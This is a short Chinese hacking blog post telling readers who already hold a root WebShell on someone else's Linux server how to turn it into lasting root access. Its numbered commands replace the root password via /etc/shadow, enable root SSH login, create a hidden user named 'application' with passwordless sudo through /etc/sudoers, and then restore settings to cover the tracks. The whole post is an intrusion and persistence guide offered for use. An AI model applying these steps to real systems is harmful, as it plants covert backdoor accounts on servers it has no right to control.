没啥技术含量,一种思路,让某些得到Root权限WebShell的同学可以快点拿到权限。

    某日拿到某站WebShell,RedHat(红旗linux)系统,Tomcat程序是Root身份启动的,WebShell当然也拥有Root权限。

具体提权思路:

1.WebShell直接替换Root密码:/etc/shadow    //记得备份

2.允许Root通过ssh登陆:
    修改:/etc/ssh/sshd_config
    PermitRootLogin yes   #允许Root登陆

3.重启ssh服务:service ssh restart

4.以Root身份登陆ssh,增加一个用户:
    useradd application
    passwd    //根据提示设置密码

5.更改application用户运行su不需密码:
   chmod +w /etc/sudoers    //增加写入权限,默认只读
   修改:/etc/sudoers
   vi /etc/sudoers
   加入:application   ALL=(ALL)        NOPASSWD: ALL

6.把Root密码修改回原样,禁止Root登陆。并去除sudoers的写属性(chmod -w /etc/sudoers)。

7.当然最后还要:chmod -w /etc/sudoers

 

Root用户登陆。

普通用户登陆,su免密码进入Root权限。